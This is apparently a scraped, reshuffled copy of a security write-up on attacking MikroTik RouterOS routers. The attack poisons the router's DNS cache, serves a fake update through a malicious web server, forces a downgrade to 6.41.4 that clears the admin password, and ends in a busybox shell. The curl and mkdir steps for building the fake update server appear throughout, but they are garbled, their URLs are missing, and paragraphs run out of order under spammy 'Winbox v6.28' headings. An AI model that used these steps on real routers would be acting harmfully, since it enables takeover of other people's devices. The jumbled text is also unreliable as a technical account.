#Winbox v6.28 full#
Here is a video of the full attack from DNS request all the way to the shell.
Using those vulnerabilities I can get a full busybox shell. The other reason I wanted to downgrade to 6.41.4 is because there are a few known vulnerabilities that enable a backdoor on the system. That means the attacker can log in as the admin user.
#Winbox v6.28 password#
Since we tricked RouterOS to downgrade from 6.45.6 all the way down to 6.41.4, the admin user’s default empty password is back. Old API authentication method will also no longer work, see documentation for new login procedure: Please secure your router after downgrading. From MikroTik’s release notes, I’ve bolded the most interesting part: Important note!!! Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. The first reason is MikroTik’s downgrade password reset logic.
#Winbox v6.28 download#
There are a couple of reasons I chose to download all the way to 6.41.4 (released April 9, 2018). That seems worthy of a proof of concept video, but I have a couple of other points I’d like to make first.
#Winbox v6.28 update#
routeros/6.45.8/ echo "lol" > CHANGELOG curl > routeros-mipsbe-6.45.8.npkĪfter restarting the malicious web server, and assuming the router’s DNS cache is poisoned, then when the user installs the “new update” they’ll bypass the normal logic that forbids downgrade via update and switch over to RouterOS 6.41.4. Be sure to name the file routeros-mipsbe-6.41.4.npk so that the router downloads the correct package (for those testing on their own change mipsbe to whatever architecture your router is using): mkdir. Next create the 6.45.8 directory and download RouterOS 6.41.4 into it. Next overwrite our previous LATEST.6 with a fictitious version (6.45.8) and the timestamp from LATEST.6fix (1562236341). First grab the output from LATEST.6fix (aka the long-term branch): curl 6.44.5 1562236341 I believe this is all predicated on being able to switch between the various branches without having to go through the special downgrade logic. As mentioned, you can take this further and trick RouterOS into downgrading by messing with the LATEST.6 information. Which just proves the RouterOS isn’t doing anything to verify the provided information. But the CHANGELOG is displayed when the user checks for updates. That might not look familiar if you don’t RouterOS often.
Old API authentication method will also no longer work, see documentation for new login procedure: *) capsman - fixed regulatory domain information checking when doing background scan *) conntrack - improved system stability when using h323 helper (introduced in v6.45) … lots more text. curl What's new in 6.45.6 (2019-Sep-10 09:06): Important note!!! Due to removal of compatibility with old version passwords in this version, downgrading to any version prior to v6.43 (v6.42.12 and older) will clear all user passwords and allow password-less authentication. Using this information, the router then requests the CHANGELOG for 6.45.6 at. The timestamp is precisely when 6.45.6 was released. You can see the response is a single line containing a version (6.45.6) and a Unix timestamp (1568106391). This returns information about the most recent Stable release. The router incorrectly caches all of these responses.
The router requests one resolution and we provide five back. And thanks to another bug, we can poison them all at once. However, the router does need, ,, and. Of course, poisoning isn’t very useful since the router won’t actually use it.
0 kommentar(er)
